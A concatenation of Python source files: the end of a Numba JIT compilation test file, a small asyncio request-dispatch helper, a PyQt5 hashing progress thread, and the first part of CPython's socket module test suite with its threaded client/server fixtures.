with self.assertRaises(errors.TypingError):
func(1)
self.assertEqual(len(fcom._failed_cache), 1)
# retry with double
with self.assertRaises(errors.TypingError):
func(1.0)
self.assertEqual(len(fcom._failed_cache), 2)
def test_direct_call(self):
@jit(nopython=True)
def foo(x):
return x[0]
self.run_test(foo)
def test_nested_call(self):
@jit(nopython=True)
def bar(x):
return x[0]
@jit(nopython=True)
def foobar(x):
bar(x)
@jit(nopython=True)
def foo(x):
return bar(x) + foobar(x)
self.run_test(foo)
def test_error_count(self):
def check(field, would_fail):
# Slightly modified from the reproducer in issue #4117.
# Before the patch, the compilation time of the failing case is
# much longer than of the successful case. This can be detected
# by the number of times `trigger()` is visited.
k = 10
counter = {'c': 0}
@generated_jit
def trigger(x):
# Keep track of every visit
counter['c'] += 1
if would_fail:
raise errors.TypingError("invoke_failed")
return lambda x: x
@jit(nopython=True)
def ident(out, x):
pass
def chain_assign(fs, inner=ident):
tab_head, tab_tail = fs[-1], fs[:-1]
@jit(nopython=True)
def assign(out, x):
inner(out, x)
out[0] += tab_head(x)
if tab_tail:
return chain_assign(tab_tail, assign)
else:
return assign
chain = chain_assign((trigger,) * k)
out = np.ones(2)
if would_fail:
with self.assertRaises(errors.TypingError) as raises:
chain(out, 1)
self.assertIn('invoke_failed', str(raises.exception))
else:
chain(out, 1)
# Returns the visit counts
return counter['c']
ct_ok = check('a', False)
ct_bad = check('c', True)
# `trigger()` is visited exactly once for both successful and failed
# compilation.
self.assertEqual(ct_ok, 1)
self.assertEqual(ct_bad, 1)
@njit
def add_y1(x, y=1):
return x + y
@njit
def add_ynone(x, y=None):
return x + (1 if y else 2)
@njit
def mult(x, y):
return x * y
@njit
def add_func(x, func=mult):
return x + func(x, x)
def _checker(f1, arg):
assert f1(arg) == f1.py_func(arg)
class TestMultiprocessingDefaultParameters(SerialMixin, unittest.TestCase):
def run_fc_multiproc(self, fc):
try:
ctx = multiprocessing.get_context('spawn')
except AttributeError:
ctx = multiprocessing
# RE: issue #5973, this doesn't use multiprocessing.Pool.map as doing so
# causes the TBB library to segfault under certain conditions. It's not
# clear whether the cause is something in the complexity of the Pool
# itself, e.g. watcher threads etc, or if it's a problem synonymous with
# a "timing attack".
for a in [1, 2, 3]:
p = ctx.Process(target=_checker, args=(fc, a,))
p.start()
p.join(_TEST_TIMEOUT)
self.assertEqual(p.exitcode, 0)
def test_int_def_param(self):
""" Tests issue #4888"""
self.run_fc_multiproc(add_y1)
def test_none_def_param(self):
""" Tests None as a default parameter"""
self.run_fc_multiproc(add_ynone)
def test_function_def_param(self):
""" Tests a function as a default parameter"""
self.run_fc_multiproc(add_func)
if __name__ == '__main__':
unittest.main()
|
web_async.py
|
from . import web
import asyncio
import threading
global_event_loop = asyncio.new_event_loop()
event_loop_executor = threading.Thread(target=lambda: global_event_loop.run_forever())
event_loop_executor.daemon = True
event_loop_executor.start()
class AsyncDispatchInfo(web.DispatchInfo):
def call(self, req):
if hasattr(self, "event_loop"):
t = self.event_loop
else:
t = global_event_loop
asyncio.run_coroutine_threadsafe(self.async_call(req), t)
async def async_call(self, req):
try:
await self.callback(req)
except Exception as e:
req.create_response().set_status(500).set_body(str(e)).send()
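# Hedged usage sketch (the names below are assumptions; the routing API of the
# `web` module is not shown in this file). The intent of AsyncDispatchInfo is
# that a coroutine callback is scheduled on the shared background event loop,
# so call() returns immediately while the handler runs asynchronously, and any
# exception is turned into a 500 response.
#
#     async def hello(req):
#         req.create_response().set_status(200).set_body("hello").send()
#
#     info = AsyncDispatchInfo(hello)      # assumed constructor: stores .callback
#     info.call(incoming_request)          # non-blocking; hello() runs on the loop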
|
StatusThread.py
|
import threading
import time
from PyQt5 import QtCore
class StatusThread(QtCore.QObject):
UpdateProgressSignal = QtCore.pyqtSignal()
def __init__(self, HashThreadOne, HashThreadTwo):
super().__init__()
self.HashThreadOne = HashThreadOne
self.HashThreadTwo = HashThreadTwo
self.Thread = threading.Thread(target=self.run, daemon=True)
def start(self):
self.Thread.start()
def run(self):
while not self.HashThreadOne.HashComplete or not self.HashThreadTwo.HashComplete:
self.UpdateProgressSignal.emit()
time.sleep(0.25)
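# Hedged usage sketch (the hasher and window objects below are assumptions; any
# objects exposing a boolean `HashComplete` attribute and a Qt slot will do).
# The polling thread emits UpdateProgressSignal every 0.25 s until both hash
# threads report completion, and the slot runs on the Qt side via the automatic
# cross-thread (queued) signal/slot connection.
#
#     status = StatusThread(hash_thread_one, hash_thread_two)
#     status.UpdateProgressSignal.connect(main_window.update_progress_bars)
#     status.start()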
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
MAIN_TIMEOUT = 60.0
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
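# Illustrative sketch (not used by the tests): packing/unpacking one classic
# CAN frame with the format above. "=IB3x8s" is can_id (u32), can_dlc (u8),
# three pad bytes, then 8 data bytes; struct null-pads short payloads.
#
#     frame = struct.pack(can_frame_fmt, 0x123, 3, b'abc')
#     can_id, dlc, data = struct.unpack(can_frame_fmt, frame)
#     assert (can_id, dlc, data[:dlc]) == (0x123, 3, b'abc')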
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8-byte aligned because of the `frames` member (see
`struct can_frame` definition). Native (not standard) types must be used for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
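# Worked example of the padding above (platform-dependent, hence hedged): with
# native "@" alignment on a typical 64-bit Linux build, calcsize("@3I4l2I") is
# 56 and 56 % 8 == 0, so no pad bytes are appended; on a 32-bit build where a
# C long is 4 bytes, the size is 36 and 36 % 8 == 4, so four "x" pad bytes
# round the struct up to the required 8-byte multiple.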
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp()).
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
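# Hedged illustration of the combination described above (not an actual test
# in this module; the class and method names are made up): mixing
# ConnectedStreamTestMixin, defined further below, with TCPTestBase yields a
# connected TCP client/server fixture equivalent to SocketConnectedTest, with
# serv_addr and cli_addr populated by the base classes.
#
#     class ExampleConnectedTCPTest(ConnectedStreamTestMixin, TCPTestBase):
#         def testEcho(self):          # server half
#             self.assertEqual(self.cli_conn.recv(1024), MSG)
#         def _testEcho(self):         # client half
#             self.serv_conn.sendall(MSG)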
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
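# Hedged usage sketch (the test names are made up): on a ThreadableTest-style
# class the server half is decorated and the client half reuses the resulting
# client_skip attribute, so both halves become no-ops together when skipped.
#
#     @skipWithClientIf(fcntl is None, "need fcntl")
#     def testFeature(self):
#         ...                       # server portion
#     @testFeature.client_skip
#     def _testFeature(self):
#         ...                       # client portion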
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if fqhn not in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
